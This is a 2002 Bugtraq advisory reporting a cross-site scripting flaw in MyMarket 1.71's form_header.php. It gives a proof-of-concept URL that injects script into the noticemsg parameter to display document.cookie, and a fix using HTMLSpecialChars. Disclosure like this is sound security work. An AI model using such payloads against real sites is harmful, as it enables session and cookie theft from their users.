[27579] in bugtraq
XSS bug in MyMarket 1.71
daemon@ATHENA.MIT.EDU (qber66)
Wed Oct 23 17:12:41 2002
Message-ID: <01b701c259bf$75bf6ba0$397ba8c0@qber66>
From: "qber66" <qber66@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Wed, 11 Sep 2002 20:17:15 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
+----------------------+
| XSS in MyMarket 1.71 |
+----------------------+
Product Description
===================
MyMarket is a fully functional online shopping catalog system, built using
PHP and MySQL. It was created by Ying Zhang for the purpose of teaching
people about the basics of creating an E-Commerce site. It can be found at
http://mymarket.sourceforge.net/
Vulnerable systems
==================
MyMarket 1.71
Exploit
=======
http://[traget]/templates/form_header.php?noticemsg=<Scr*ipt>javascript:aler
t(document.cookie)</Scr*ipt>
(without "*")
Solution
========
put this two lines at the begin of form_header.php
---- form_header.php -----
<?
$noticemsg = HTMLSpecialChars($noticemsg);
$errormsg = HTMLSpecialChars($errormsg);
...
--------------------------
Vendor response
===============
I submitted this a week ago, the vendor didn't response yet.
------------------------------
Tim Vandermeersch
qber66@pandora.be
http://users.pandora.be/tim/
